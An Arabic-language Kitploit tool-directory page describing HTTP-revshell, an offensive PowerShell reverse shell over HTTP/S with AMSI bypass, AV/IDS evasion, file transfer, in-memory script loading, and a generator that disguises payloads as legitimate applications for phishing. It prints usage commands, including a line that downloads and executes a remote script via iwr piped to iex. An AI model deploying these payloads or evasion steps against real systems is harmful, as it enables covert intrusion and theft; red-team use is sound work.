Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HTTP-revshell — شل عكسي باستخدام بروتوكول HTTP/S مع تجاوز AMSI ومدرك للوكيل | Kitploit
أدوات/GitHubGitHub/3v4si0n/http-revshell
أدوات التصيدتوليد الحمولةالتهرب من IDS/IPSما بعد الاستغلالالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHub3v4si0n/http-revshell

HTTP-revshell

شل عكسي باستخدام بروتوكول HTTP/S مع تجاوز AMSI ومدرك للوكيل

عرض المستودع
59890منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شل عكسية عبر HTTP/S باستخدام باورشيل

Category-tool Powershell Python License

HTTP-revshell هي أداة تركز على تمارين الفريق الأحمر ومختبرات الاختراق. توفر هذه الأداة اتصالاً عكسياً عبر بروتوكول HTTP/S. تستخدم قناة خفية للسيطرة على الجهاز الضحية من خلال طلبات الويب وبالتالي تفادي حلول مثل IDS و IPS و AV.

ملاحظة: لن يتم صيانة الأداة من حيث التهرب. مع بعض التغييرات البسيطة يمكنك تجاوز العديد من EDRs الموجودة في السوق.

HTTP-revshell

مساعدة server.py

استخدام الخادم:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

مساعدة Invoke-WebRev.ps1 (العميل)

استخدام العميل:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

التثبيت

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

الميزات

  • SSL
  • مدرك للبروكسي
  • رفع الملفات
  • تنزيل الملفات
  • تحميل سكربتات باورشيل عبر الخادم
  • التحكم في الأخطاء
  • AMSI bypass
  • الإكمال التلقائي لوظائف باورشيل (اختياري)

استخدام الوظائف الإضافية

رفع

تتيح لك هذه الوظيفة رفع أي ملف إلى الجهاز الضحية.

الاستخدام:

root@kitploit:~
upload /src/path/file C:\dest\path\file

تنزيل

تتيح لك هذه الوظيفة تنزيل ملف إلى جهاز المهاجم.

الاستخدام:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

تتيح لك هذه الوظيفة تحميل سكربتات باورشيل دون الحاجة إلى الكتابة على قرص الضحية، وذلك بقراءة الملف عبر حركة مرور HTTP شرعية.

الاستخدام:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

مساعدة Revshell-Generator.ps1 (مولد التحميل التلقائي)

يتيح لك هذا السكربت إنشاء ملف تنفيذي يحتوي على الحمولة اللازمة لاستخدام HTTP-revshell، كل ما عليك هو اتباع التعليمات على الشاشة لإنشائه. هناك 6 قوالب محددة مسبقاً وقالب قابل للتخصيص، مع البيانات التي تريدها.

الحمولات التي يولدها السكربت تتضمن أيقونة التطبيق الأصلي، بالإضافة إلى معلومات المنتج وحقوق النشر الخاصة بالتطبيق الأصلي. علاوة على ذلك، كل منها يفتح التطبيق الأصلي قبل إنشاء الاتصال مع الخادم، متظاهراً بأنه تطبيق شرعي. يمكن استخدام هذا في التصيد أو تمارين الفريق الأحمر.

استخدام مولد التحميل:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

هام: جميع الحقول في القوالب المحددة مسبقًا يتم إكمالها تلقائيًا بالضغط على مفتاح Enter.

الشكر والتقدير

  • JoelGMSec لسكربت Revshell-Generator.ps1 الرائع. تويتر: @JoelGMSec
  • dev-2null للإبلاغ عن أول خطأ. تويتر: @dev2null

إخلاء المسؤولية والترخيص

هذا السكربت مرخص بموجب LGPLv3+. رابط مباشر للترخيص الترخيص.

يجب استخدام HTTP-revshell فقط لاختبار الاختراق المصرح به و/أو للأغراض التعليمية غير الربحية. لن يكون أي استخدام خاطئ لهذا البرنامج من مسؤولية المؤلف أو أي متعاون آخر. استخدمه على خوادمك الخاصة و/أو بإذن من مالك الخادم.

تنزيل الأداة